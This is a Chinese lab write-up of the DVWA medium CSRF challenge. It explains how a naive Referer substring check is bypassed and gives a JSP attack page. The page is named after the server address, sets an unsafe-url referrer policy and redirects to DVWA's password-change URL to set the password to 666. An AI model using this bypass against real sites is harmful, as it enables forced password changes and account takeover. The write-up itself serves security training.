首页 > 其他分享 >DVWA CSRF medium

DVWA CSRF medium

时间:2023-10-22 14:56:37浏览次数:39  
标签:medium http 0.1 xxx DVWA 127.0 CSRF

一、DVWA CSRF medium 代码分析

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
  ...
}

medium 添加了对 http referer 头的判断,但只是简单的判断。

只要http referer 头里包服务器域名就可以了。

二、实现步骤

1、把DVWA部署在127.0.0.1的地址上,并访问csrf生成链接

 2、部署攻击服务器,部署在另外一个ip或域名上,如 xxx.xxx.xxx.xxx

 3、攻击服务器实现csrf的代码如下,这是一个jsp文件,这个jsp的文件名是:“ 127.0.0.1.jsp ",是的,没错,这个名字是合法的

<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html>
<!--
    访问方法:
    http://192.168.143.12:9999/127.0.0.1.jsp
-->
<head>
    <title>JSP - Hello World</title>
    <meta name="referrer" content="unsafe-url">
    <script>
        function skip () {
            document.location.href="http://127.0.0.1:65530/DVWA/vulnerabilities/csrf/?password_new=666&password_conf=666&Change=Change;";
        }
        skip();
    </script>
</head>
<body>
</body>
</html>

4、浏览器首先访问DVWA:http://127.0.0.1:65530/DVWA并登陆成功

5、浏览器接着访问攻击服务器:http://xxx.xxx.xxx.xxx:9999/127.0.0.1.jsp


 

标签:medium,http,0.1,xxx,DVWA,127.0,CSRF
From: https://www.cnblogs.com/changrunwei/p/17780438.html

相关文章

  • web基础漏洞-csrf
    1、定义csrf,crossscriptrequestforgery跨站请求伪造,是受害者用户在登录目标网站A后,攻击者基于社工手段使其在同主机同浏览器环境下,访问攻击者控制的网站B,网站B的页面伪造请求通过该浏览器提交到网站A,同时携带对网站A保存在浏览器中的cookie登录凭证,使得网站A的服务端接收后认......
  • hackthebox agile medium
    信息收集portscanningsudonmap--sT--min-rate10000-p-10.10.11.203-oAnmap/agilesudonmap-sT-sC-sV-pxx10.10.11.203-oAnmap/detialbannertellsusit'sanubuntuserverwealsoaddthatdomainto/etc/hostsfile->10.10.11.203superp......
  • CSRF篇
    CSRFCSRF(Cross-SiteRequestForgery)漏洞是一种Web应用程序安全漏洞,它利用了用户在已登录的Web应用程序上的身份验证状态。攻击者通过欺骗用户使其执行非预期的操作,从而利用用户的权限发起恶意请求。无任何防护网站CSRF攻击:先抓取到那个你要实现的功能的那个数据包(比如说你要......
  • burpsuite靶场----CSRF----token验证取决于其是否存在
    burpsuite靶场----CSRF----token验证取决于其是否存在靶场地址https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present正式开始1.登录2.抓包,发现有token3.删掉这个csrf参数,发现无影响但是如果换......
  • burpsuite靶场----CSRF----token验证取决于请求方法
    burpsuite靶场----CSRF----无防御靶场地址https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method正式开始1.登录2.抓包,发现有一段token3.尝试删掉token,发现不行4.尝试改变请求方式发现也能实现功......
  • burpsuite靶场----CSRF----无防御
    burpsuite靶场----CSRF----无防御靶场地址https://portswigger.net/web-security/csrf/lab-no-defenses正式开始1.登录2.更改email,抓包3.创建poc<html><!--CSRFPoC-generatedbyBurpSuiteProfessional--><body><script>history.pushState(......
  • CSRF 攻击原理与防御
    定义跨站请求伪造,攻击者利用服务器对用户信任,从而欺骗受害者点击vps上的恶意请求链接。与xss的区别xss是利用用户对服务端的信任;csrf利用服务端对用户的信任xss攻击是让脚本在用户浏览器上执行,服务端只是恶意脚本的载体;csrf攻击不需要知道用户cookie,让受害者点击我们准备......
  • 【靶场部署】DVWA靶场搭建
    一.靶场是什么,靶场的搭建在学习web安全的过程中,靶场是必不可少的,毕竟在计算机界,任何理论知识都不如实操靶场就是人为提供的带有安全漏洞的服务,每一个学习者都可以在本地快速搭建来实操,回溯漏洞的发生原理以及操作方式。DVWA靶场呢就是一个可以通过浏览器访问的拥有可视化页面的w......
  • kali搭建DVWA踩的坑
    在网上看视频安装DVWA的时候还是遇到了很多问题,这里截取部分新手问题,提出解决方法,避免踩坑。kali搭建LAMP安装apacheaptinstallapache2-y设置开机自启动按q退出安装mysqlaptinstallmariadb-server-y同样设置开机自启安装phpapt-yinstallphp7/0php-pearlibap......
  • 一个简单的DVWA盲注
    安装江湖规矩先用'干一下,1‘  提示不存在ID,那么用"干一下, 他显示存在了,那是为什么,只能是当为'时被闭合掉了,报错了才会这样,那么我们使用1'--+测试一下想法 存在,我们的想法是成立的。那么就能判断出这是一个布尔盲注,但如果要用时间盲注的话也可以。接下来我们通过leng......